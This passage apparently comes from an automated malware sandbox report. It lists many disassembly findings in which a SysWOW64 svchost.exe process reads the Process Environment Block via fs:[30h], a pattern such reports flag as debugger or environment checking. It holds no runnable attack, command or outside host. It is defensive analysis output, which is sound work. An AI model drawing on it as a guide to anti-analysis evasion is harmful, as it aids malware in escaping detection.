Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]	2_2_037C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]	2_2_037325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]	2_2_037365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]	2_2_0376E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]	2_2_03764588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]	2_2_037BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]	2_2_037EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]	2_2_0372645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]	2_2_0375245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]	2_2_0376A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]	2_2_0372C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]	2_2_037304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]	2_2_037644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_037BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]	2_2_037364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]	2_2_037EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]	2_2_0372CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]	2_2_03728B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]	2_2_037DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]	2_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]	2_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]	2_2_037D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]	2_2_03804B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]	2_2_0375EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_037BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_037DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]	2_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]	2_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]	2_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]	2_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]	2_2_03804A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]	2_2_037DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]	2_2_0376CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]	2_2_0376CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]	2_2_0375EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]	2_2_037BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]	2_2_03730AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]	2_2_03786AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]	2_2_03768A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]	2_2_037BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]	2_2_037B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]	2_2_037B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]	2_2_037C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]	2_2_037BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_037BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]	2_2_037649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_037FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]	2_2_037C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]	2_2_03804940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]	2_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]	2_2_03752835
